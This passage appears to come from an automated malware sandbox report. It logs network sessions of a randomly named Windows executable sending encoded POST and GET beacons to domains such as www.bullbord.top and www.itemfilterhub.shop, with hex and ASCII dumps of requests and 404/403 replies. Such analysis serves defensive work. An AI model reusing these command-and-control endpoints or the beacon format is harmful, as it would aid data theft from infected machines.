                                                Data Raw: 69 6a 36 30 4d 74 59 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 55 47 73 4b 41 2f 4c 52 66 62 65 38 6d 6b 2b 56 43 7a 30 76 4c 37 41 51 65 7a 73 39 38 65 73 50 4c 58 71 52 77 56 41 6f 76 4d 32 57 45 56 42 35 6d 49 34 4e 2f 39 31 53 55 4c 52 46 44 34 65 69 72 75 67 6b 4c 42 58 42 65 64 4e 57 73 4a 2b 56 46 38 46 39 53 48 42 65 71 49 4b 36 48 70 53 5a 53 4e 71 49 54 5a 68 39 64 39 45 41 65 6e 35 6f 71 2f 63 33 58 47 7a 39 30 71 33 6e 74 4b 54 41 51 58 66 52 73 49 75 4f 4e 41 78 73 36 6d 43 4f 37 2b 77 67 4b 56 67 58 6b 5a 76 53 46 70 4e 33 4a 42 45 61 51 4d 33 2f 64 75 33 5a 57 56 51 34 73 77 35 51 71 5a 4b 5a 48 52 6c 62 70 41 69 32 76 61 54 77 4e 39 42 71 34 6f 4c 69 35 51 6b 41 7a 49 2f 7a 65 45 45 76 52 44 71 36 58 49 44 79 59 5a 6c 6d 73 6c 35 45 75 76 32 42 47 75 33 48 34 52 34 6a 76 42 36 51 42 46 6f 6b 6c 65 64 37 77 64 35 56 74 57 55 78 56 48 4d 55 67 6b 37 38 6a 2b 36 64 68 69 75 45 6f 45 64 4b 69 4a 68 48 [TRUNCATED]
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDUGsKA/LRfbe8mk+VCz0vL7AQezs98esPLXqRwVAovM2WEVB5mI4N/91SULRFD4eirugkLBXBedNWsJ+VF8F9SHBeqIK6HpSZSNqITZh9d9EAen5oq/c3XGz90q3ntKTAQXfRsIuONAxs6mCO7+wgKVgXkZvSFpN3JBEaQM3/du3ZWVQ4sw5QqZKZHRlbpAi2vaTwN9Bq4oLi5QkAzI/zeEEvRDq6XIDyYZlmsl5Euv2BGu3H4R4jvB6QBFokled7wd5VtWUxVHMUgk78j+6dhiuEoEdKiJhHQImIZNBZ/obaSLmXgB6Mi3o20BhYGBDJQ5hcjZicpqCwkL74PZal7Y2EEGTaPHahzHBdT7mb1iUcq34EBtQ6JdBWX+tFM6ZnByKEz433xotfmoniu877xwzxCyXjm4/k47oYiU5rmwaBxp+1kOX2L2oILVjgRiI380yFeECUQ9JAClh8TK+ixuP8uV2coeVwAfwTzJzbhzPAxBIs6O4po+LW90bxKemRiUB4clbuTM/kLOjukUixtibN8qoR0UQXs4yNEpLDyvF6d7+R6ZS1igO6yMu6iXK8lbjBzLQrYq0akcxKg5VIhyZdIR25suy8s9M2+YEdzjZsxHfjI7H2M9ra2mKrEBtH3oE5fnlBP0k1uV7D5icewCHw1+YxgxFeYFdeNZ8m08F2oAbIvve6xRV472VDyDijmHcWlGEMnImwoPg7QXsQGDXsNSA3P5w11EP9QwvgOWSO8Ehgsafqtv17VjdLLTCmlE1gciL/IKVR6Hllrmpko8C4QLYJ4bie0YiPtEyMYVaepMe4egQkZb6oCHhtc0VPkS3o+wp3eqsV2WE/XFZZ0F9gcx5ZyQHLQ7h1w1mnQ8cqwwb/LLdY+HOUmHUQbiU6lFqJ1Rm3lRkPNqY54GjwrhlP0qlRmzUfshv9Za+vCbLb/ZlMRqjUnP6lNick31MbIC [TRUNCATED]
                                                Aug 27, 2024 07:59:33.499593973 CEST5156OUTData Raw: 57 75 57 68 31 32 45 32 35 43 49 4c 33 64 4d 37 50 74 67 78 63 78 35 63 66 30 71 39 51 70 75 2f 4e 61 59 31 37 66 65 6d 67 49 30 33 77 38 66 49 4f 52 65 57 62 33 63 30 47 59 45 72 50 42 45 6c 6e 72 5a 78 31 4a 34 4a 6f 68 50 4d 4f 49 34 73 78 71
                                                Data Ascii: WuWh12E25CIL3dM7Ptgxcx5cf0q9Qpu/NaY17femgI03w8fIOReWb3c0GYErPBElnrZx1J4JohPMOI4sxqtHlPqBwZK7HcFp+qI8a0njjsjOE2jIVFYhHIIClQVPQWuiMbNgOh2hiCmE35svYgUwN2nHjcJR9Wg34RZ710xeCG+TW8OfvV0l6zXhwadVyvt3mEum8RQwpNyf+ftbOzwkUV2Y2zF2W1tQhtZGP5kJiLpwXE1gt+i
                                                Aug 27, 2024 07:59:33.499641895 CEST5156OUTData Raw: 6c 56 44 31 43 68 74 51 30 79 44 54 55 2f 50 6d 54 34 42 43 59 59 7a 4c 55 61 62 63 78 4a 4c 4f 73 77 71 5a 44 46 57 2b 4a 4a 76 37 4c 70 47 46 30 42 46 6c 56 61 61 42 49 64 36 5a 59 42 2f 4e 4d 30 69 78 66 4a 6f 33 54 79 52 72 2b 6a 38 4e 44 6e
                                                Data Ascii: lVD1ChtQ0yDTU/PmT4BCYYzLUabcxJLOswqZDFW+JJv7LpGF0BFlVaaBId6ZYB/NM0ixfJo3TyRr+j8NDn/vU2JRQhxDVAPKUXsRchLt9ID7ibznfXXYxskvZs+ctmANoIkXMLrx4sj3AukEcr43VDUVzc4eGDUc6sK5v39Tgym5NdS/f+Fm7DBTcD+jmvKt4gvjyqJ72s5kCySnUUj5HgCvtdKmtVUYFmgfq+rKheKtzbZXmCr
                                                Aug 27, 2024 07:59:33.600505114 CEST1289OUTData Raw: 4a 74 4d 2b 68 6e 77 4f 2b 6a 43 4d 6c 2f 75 34 4f 4b 2b 48 50 6b 66 7a 44 4c 42 62 74 4c 43 35 50 6e 69 46 36 47 7a 44 55 59 4e 45 50 49 34 35 6b 59 6d 33 45 65 6b 4f 6e 66 6c 65 52 67 69 69 63 6a 65 35 6a 73 34 77 48 66 4c 68 49 76 78 65 74 59
                                                Data Ascii: JtM+hnwO+jCMl/u4OK+HPkfzDLBbtLC5PniF6GzDUYNEPI45kYm3EekOnfleRgiicje5js4wHfLhIvxetYEc9QBjiqGO44s9rAQ9fx24ERD7lbtuTE+sO+Zf5qT+DFNEBodaNih/8RN9jfYHjlL4PS4wQKlNZON9iUxn3BChjEYfTCv78Nuq77DwDrXLXcE1WhIq29d2igGwyF+clu4ldwREfGIBG8QyXzk6gfHitDd7rHUg6L7
                                                Aug 27, 2024 07:59:33.600718975 CEST9023OUTData Raw: 65 64 6f 32 36 67 41 4d 33 72 4e 4b 52 4d 43 41 62 6d 70 49 2b 53 45 49 6f 35 62 58 47 43 5a 2f 4a 6a 58 79 62 48 79 2f 62 39 34 51 77 51 34 72 37 4b 45 72 61 62 31 41 53 43 77 52 62 6c 53 74 62 54 33 78 6e 44 33 74 52 63 76 41 6b 47 31 4f 6c 73
                                                Data Ascii: edo26gAM3rNKRMCAbmpI+SEIo5bXGCZ/JjXybHy/b94QwQ4r7KErab1ASCwRblStbT3xnD3tRcvAkG1OlsxOAgZwZnYahIIzvT+qBHw2IGsGqpjXSkFxMs4RfGsll9QfXrPFXHc7A/0azu6VEWH+877+wEQJSlpY/xqXj9+OKLeEbFNV5PiwmkErqGisp4ewq8SUokkXghuGsvd0q7XmorZcAfzwtcVJLgdU2FvQDUdRzpAlZFm
                                                Aug 27, 2024 07:59:33.601011992 CEST2578OUTData Raw: 66 4a 68 66 7a 46 6a 6d 71 52 36 55 6d 75 4e 67 32 6c 32 4f 72 74 54 74 55 57 73 41 5a 72 61 46 72 54 7a 36 49 44 75 50 6a 4d 36 61 76 56 31 36 64 52 43 4b 45 47 78 33 7a 6e 7a 43 41 45 38 61 78 5a 4d 75 72 30 4b 6b 69 30 76 69 30 30 55 73 44 65
                                                Data Ascii: fJhfzFjmqR6UmuNg2l2OrtTtUWsAZraFrTz6IDuPjM6avV16dRCKEGx3znzCAE8axZMur0Kki0vi00UsDe7JNBAkP9ubVcAcF+ry8sTILb4p6NtyB6v4ErbuTGBQ7EWfAEtzuF4GUWy8rw7/YeTJp9uo3s197btPZog6sOhhAxfQ4uzaTLbmH2X4eNM2qqyxp5otz/xW5LUuLFFXVebfhv/SSpQX6p41R1XGFdB3q3k7zfBKqcS
                                                Aug 27, 2024 07:59:33.601186991 CEST12890OUTData Raw: 75 50 54 70 35 43 63 41 6c 73 34 50 74 2f 63 41 6a 77 39 74 6a 35 64 48 35 39 69 53 70 37 6f 43 7a 6d 45 4c 52 77 64 62 4f 73 54 66 61 64 30 73 30 31 2b 4f 37 76 57 65 77 4f 4d 75 6b 54 31 33 69 4f 62 4c 67 2b 34 2b 41 7a 38 51 65 39 76 43 62 63
                                                Data Ascii: uPTp5CcAls4Pt/cAjw9tj5dH59iSp7oCzmELRwdbOsTfad0s01+O7vWewOMukT13iObLg+4+Az8Qe9vCbchiCefYiBMGB+gM084xepihkWzzZ5JEZiliu+nfIFNrtEiNgnd8BI7ODhvF9GkRQFCbG7QxNyMMrtvXyKtcGOMOXS+ZAdrHwKFPjGGX7xri7H84g4ON62b8R/OIVzhwgAW9uO3EWuQWC2iZuopl8X/5nOfsaTVKVfi
                                                Aug 27, 2024 07:59:33.701580048 CEST2578OUTData Raw: 78 44 78 41 6c 41 6e 2b 6f 52 46 48 72 49 48 53 65 50 66 34 37 68 46 7a 4d 35 70 59 4f 31 66 30 49 52 6e 4c 59 50 78 49 37 30 57 6f 73 7a 61 30 69 4f 62 6f 69 64 62 77 49 41 71 69 78 7a 6d 4d 36 6c 33 52 56 79 52 77 46 73 51 70 58 76 4c 4a 64 75
                                                Data Ascii: xDxAlAn+oRFHrIHSePf47hFzM5pYO1f0IRnLYPxI70Wosza0iOboidbwIAqixzmM6l3RVyRwFsQpXvLJduO2NTlN6rKI7bK3kp6DjRHqVYMk+RZpY7iy4ycc3Xe9htuwRjenUYoCtjs7qHMKfwQFL540ksNRt31seJMbZea9HKVDSFcLNHkeVWZ1xAYruM0KRH5LuigLSkL9SxsMT7w5xdFg3qkFUWXt86O/DdO16TJ8HuYH2fW
                                                Aug 27, 2024 07:59:33.701711893 CEST7734OUTData Raw: 4e 50 62 41 75 5a 31 76 7a 44 4f 75 59 73 6e 34 55 5a 74 75 54 34 6a 4d 58 39 36 32 6d 48 66 74 57 34 41 5a 54 54 70 46 49 35 2b 51 35 2f 58 78 65 34 50 61 35 65 36 54 62 42 57 7a 77 72 52 66 78 41 46 55 67 4e 53 52 6a 72 74 6c 51 49 4a 49 30 33
                                                Data Ascii: NPbAuZ1vzDOuYsn4UZtuT4jMX962mHftW4AZTTpFI5+Q5/Xxe4Pa5e6TbBWzwrRfxAFUgNSRjrtlQIJI03otaLKXxqkEmPRaBV0wqsIwCEA7tQl1pW5h30mJOrqTL7P0fhba19M2YZg8ToL0wWYD9Ho/WDcq83X23NWhCCmVIJawEy6CtIa+KgMbkucn2PO/FLOl+wskMj0GVGBCtPgSt/+S7TtXOvwiAmUJa4JwmMp7jCMsYVC
                                                Aug 27, 2024 07:59:33.701880932 CEST4583OUTData Raw: 52 35 59 55 6e 65 41 59 33 35 4d 64 58 53 59 68 79 63 48 6b 45 42 78 43 72 37 54 6a 42 2b 59 78 36 45 4d 42 30 38 4d 4d 66 59 7a 67 42 35 75 61 74 43 6b 59 41 79 46 45 74 61 46 5a 45 58 47 67 4b 79 57 79 66 5a 53 52 2b 4f 48 39 54 6f 50 52 6b 4c
                                                Data Ascii: R5YUneAY35MdXSYhycHkEBxCr7TjB+Yx6EMB08MMfYzgB5uatCkYAyFEtaFZEXGgKyWyfZSR+OH9ToPRkLvXNw2LhaK7YA155RkmXQCZ9XNw5r/0tuaRUet5Emc3XMUcWRFKu4o8atBcjyaNthul27alNGk1+s2bqQTt9fjNm7659Qclm3unJwmLy9Sf3ZmZV2kbhQY5gclR4JS9vHOlpzcaLv5xRhnXkdO8blcOxZes5OKtoz5
                                                Aug 27, 2024 07:59:33.944830894 CEST734INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:33 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FaoOuLDvkP42IhjTPqjAnqewpXUKwDDLKIHtZwVLbM%2Fi6GCKz7XFHGON9ZchIRDzmWppr7iFIDKdhueJk9GxrK7gW7ppxqSTfDSV140vrwa9mh7oUU0Tp2ewWHWp663lOanrkDA4%2BXZ7"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d612bdf43946-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 0d 0a
                                                Data Ascii: 7f\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk
                                                Aug 27, 2024 07:59:33.944861889 CEST15INData Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                Data Ascii: a8>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.11.2049861172.67.166.145807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:36.135802031 CEST552OUTGET /p1v4/?ij60MtY=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY=&wXB=brv4Erb HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:36.398654938 CEST744INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:36 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Qo%2B0euOpWM6nIjSM4fXDN2SOwXlwMgzitGttylGWqgsFr1AC1uvr6WvIdsohoQ2aaqsg260UM%2F6GTnpjW31vsbz6Y%2BcPn8YejWGuXSafuqab6nxYxIL4AkfPzv3uUP1bHP7l79ekIHH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d6232bd31fe2-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
                                                Aug 27, 2024 07:59:36.398694992 CEST5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.11.2049862203.161.46.205807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:41.772563934 CEST814OUTPOST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 34 39 52 2b 61 42 42 78 39 7a 30 5a 45 5a 34 69 6e 58 6c 64 67 47 54 41 50 30 4a 2b 4c 73 65 44 46 43 46 42 2f 39 58 64 76 67 68 67 7a 6a 55 30 35 79 70 67 6a 6e 61 45 4a 55 43 2b 57 6b 78 4f 4e 65 76 4b 6c 77 7a 61 4e 54 70 4a 75 6a 74 57 75 64 78 63 68 76 6a 53 44 68 74 38 42 68 4b 4d 71 58 5a 6a 4e 38 62 36 6d 35 4b 61 69 55 39 7a 70 4b 6a 48 73 52 69 4e 56 74 78 48 4c 30 5a 4f 42 61 77 68 4a 6d 4a 58 70 58 4d 75 78 4b 53 73 71 67 71 76 59 70 37 6a 32 41 46 65 65 69 57 63 38 38 56 6e 6e 42 67 6e 57 75 6c 39 4a 2b 6b 4e 55 65 67 68 44 67 3d 3d
                                                Data Ascii: ij60MtY=PRYlSxU0BJHV49R+aBBx9z0ZEZ4inXldgGTAP0J+LseDFCFB/9XdvghgzjU05ypgjnaEJUC+WkxONevKlwzaNTpJujtWudxchvjSDht8BhKMqXZjN8b6m5KaiU9zpKjHsRiNVtxHL0ZOBawhJmJXpXMuxKSsqgqvYp7j2AFeeiWc88VnnBgnWul9J+kNUeghDg==
                                                Aug 27, 2024 07:59:41.945604086 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:41 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                Aug 27, 2024 07:59:41.945714951 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                Aug 27, 2024 07:59:41.945729017 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                Aug 27, 2024 07:59:41.945848942 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                Aug 27, 2024 07:59:41.945971966 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                Aug 27, 2024 07:59:41.945986986 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                Aug 27, 2024 07:59:41.946141958 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                Aug 27, 2024 07:59:41.946156025 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                Aug 27, 2024 07:59:41.946167946 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                Aug 27, 2024 07:59:41.946178913 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                Aug 27, 2024 07:59:42.112746000 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.11.2049863203.161.46.205807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:44.466876030 CEST1154OUTPOST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
